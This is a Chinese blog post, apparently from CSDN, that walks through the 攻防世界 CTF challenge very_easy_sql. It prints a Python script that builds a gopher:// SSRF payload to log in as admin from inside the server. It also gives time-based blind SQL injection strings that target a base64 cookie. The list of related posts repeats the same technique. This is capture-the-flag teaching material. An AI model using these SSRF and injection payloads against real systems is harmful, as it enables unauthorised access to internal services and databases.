very_easy_sql-攻防世界

于 2024-04-02 10:40:22 发布
阅读量395 收藏 5
点赞数 4
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szhangliwenya/article/details/137244197
版权

题目

 

抓包发现use.php文件

 页面说"you are not an inner user, so we can not let you have identify~",就是说只能内部访问登录。这里抓包还看到返回包里有个set-cookie,说明是ssrf造成的sql注入

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人) 

因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。

【网络安全 | HTTP】 gopher协议原理、语法及利用总结-CSDN博客

http://61.147.171.105:55753/use.php?url=127.0.0.1/use.php

 构造ssrf语句实现从内部访问

官方wp里写使用admin,admin弱密码账号,还说登录框是用来校验这个用户名和密码是否再数据库中存在的,所以还是没告诉是弱密码

import urllib.parse

host = "127.0.0.1:80"
content = "uname=admin&passwd=admin"
content_length = len(content)

test =\
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(host,content_length,content)

tmp = urllib.parse.quote(test) 
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new) 
print("gopher://"+host+"/_"+result)

 

gopher://127.0.0.1:80/_POST%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%2520%252A/%252A%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252024%250D%250A%250D%250Auname%253Dadmin%2526passwd%253Dadmin%250D%250A 

 

 返回包里发现set-Cookie,返回了base64编码的信息,解码后就是admin

这个cookie就是注入点。重新构造一个gopher的payload,带上这个cookie的内容再去访问use页面:由于不回显,所以选择时间盲注,用admin') and if(1,sleep(5),1)#进行测试,或者') and if(1,sleep(5),1)#都可。
(这里闭合点,自己测试吧,先单引号再双引号,再加括号)

 

20_aw
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 7805
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
攻防世界web新手 - very_easy_sql(非常详细的wp)
yuanxu8877的博客
11-27 7029
攻防世界web新手 - very_easy_sql(非常详细的wp),希望大家不要吝啬您的点赞收藏哦。
Web安全攻防世界08 very_easy_sql
weixin_42789937的博客
12-25 3144
Web安全攻防世界08 very_easy_sql,我也有点稀里糊涂,经过了多次失败,终于水了一篇混杂了30%的博文链接+60%的错误解法+文末10%官网wp的博文~
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 7375
攻防世界 -- very_easy_sql
攻防世界-very-easy-sql
最新发布
chinese_cabbage0的博客
02-28 1802
攻防世界的这个题目的详细解析,没有比这个更加全面,更加通俗易懂的了,大家可以参考一下,学生到很多东西
[攻防世界]very_easy_sql
GKD2019的博客
01-24 902
# [攻防世界]very_easy_sql 参考链接:https://blog.csdn.net/yuanxu8877/article/details/128069145 ### 0x00 前置知识 - ssrf + gopher协议 - sql注入(报错注入or时间盲注) - python脚本编写 ssrf可以利用协议作为探针访问内网,如http,file,dict,ftp,gopher等 ## gopher协议和ssrf联合使用 > gopher协议是一种信息查找系统,他将Inter
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
gaoguchap2.zip_ray_x ray_x-ray
09-24
The document shows the basic knowledge of X-ray,it is very useful to learn the X-RAY and X-RAY system.
Python库 | mohas_very_simple_dictionary-2.0.1-py3-none-any.whl
04-23
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:mohas_very_simple_dictionary-2.0.1-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
clara-clarans.zip_CLARA_clarans_clarans matlab_k-medoids
07-15
k-medoids with matlab is very strong
【愚公系列】2023年05月 攻防世界-Web(very_easy_sql)
时光隧道
05-27 7800
SSRF(Server Side Request Forgery)是一种安全漏洞,攻击者可以利用该漏洞远程发送请求,使得目标服务器处理攻击者指定的请求,而不是合法的请求。攻击者可以利用此漏洞,访问受保护的资源,或者从外部网络中执行任意命令。Gopher协议是一种用于访问互联网资源的协议,通过gopher协议可以访问各种不同类型的协议,包括http、ftp、SMTP等。攻击者可以利用gopher协议来构造恶意请求,从而利用SSRF漏洞攻击目标系统。
攻防世界Web题wp解析(难度3)
m0_63138919的博客
08-04 269
本文为攻防世界web题难度3的解题思路和方法
web:very_easy_sql(sql、ssrf、gopher协议sql注入)
sleepywin的博客
12-02 475
通过报错信息,可以找到闭合点,有报错信息,直接使用报错注入。数据库信息被回显出来了,报错信息可以使用,按正常的步骤走。联系之前原始页面写的“不是内网用户,无法别识身份”构造payload,检查是否可以进行报错注入。解码结果为admin,cookie为注入点。随便输入了一个,发现url有参数显示。把这个set-cookie解码出来为。试一下靶机的网址,返回nonono。查到flag表里只有一个flag列。查看源码,找到一个use.php。显示不是内部用户,无法识别信息。用bp抓包修改信息后,显示如下。
攻防世界】Web very_easy_sql
DG_s1mple
12-31 1723
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同,Bool 盲注是通过页面的一些变化来进行判断结果,但是有时候,执行一些 sql 语句的测试,页面不会有像布尔盲注那样直观的变化,这个时候可以在布尔盲注的基础上结合 if 判断和 sleep() 函数来得到一个时间上的延迟参照,也就可以让我们进行一些判断。当你在index.php登录admin,admin的时候,是不会登录成功的,只能在use.php用ssrf去登录,因为它需要在内部登录。很幸运的是,好像登录上去了,这一串解码出来是admin。
CTF 总结03:SQL注入
weixin_42789937的博客
02-25 390
CTF 总结03:SQL注入,在此整理一篇答题合集,适合与我一样对与SQL知道那么一点点,但是又不怎么熟悉流程的小白~
攻防世界--very_easy_sql
08-26 5955
页面显示"you are not an inner user, so we can not let you have identify~",就是说只能内部访问登录。这里抓包还看到返回包里有个set-cookie。注入点在cookie,通过使用时间盲注payload然后再base64转码,编写盲注脚本。构造ssrf语句实现从内部访问。...
攻防世界】学习记录-web(系数1 part2)
龟速更新的九某人
08-13 4378
攻防世界】学习记录-web(系数1 part2) 0482 weak_auth 0485 simple_php 0712 baby_web 1004 inget 1005 easyupload 1007 fileinclude 1008 very_easy_sql 1010 fileclude
攻防世界 web篇(一)
weixin_51387754的博客
09-08 1656
攻防世界 是一群信息安全大咖共同研究的答题、竞赛、以游戏方式结合的一款新型学习平台,融入多种场景在线题型,集实战、理论、趣味于一体。
修改带有TODO标记的那一行, 使程序能正常运行并得到给定输出。 class VeryHardProblem(): # 请勿修改这行 def __init__(self): # 请勿修改这行 self.needlessly_complicated_description = "-".join(["blah"]*99) # 请勿修改这行 # 请修改接下来的一行代码。 class VeryVeryHardProblem(): """TODO""" pass # 请勿修改这行 very_very_hard_problem = VeryVeryHardProblem() # 请勿修改这行 print(very_very_hard_problem.needlessly_complicated_description) # 请勿修改这行
05-24
class VeryVeryHardProblem(VeryHardProblem): # 修改这一行 def __init__(self): super().__init__() # 调用父类的构造函数 self.needlessly_complicated_description = "-".join(["blah"]*999) # 修改这一行 very_very_hard_problem = VeryVeryHardProblem() print(very_very_hard_problem.needlessly_complicated_description) # 输出:blah-blah-blah-...-blah

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值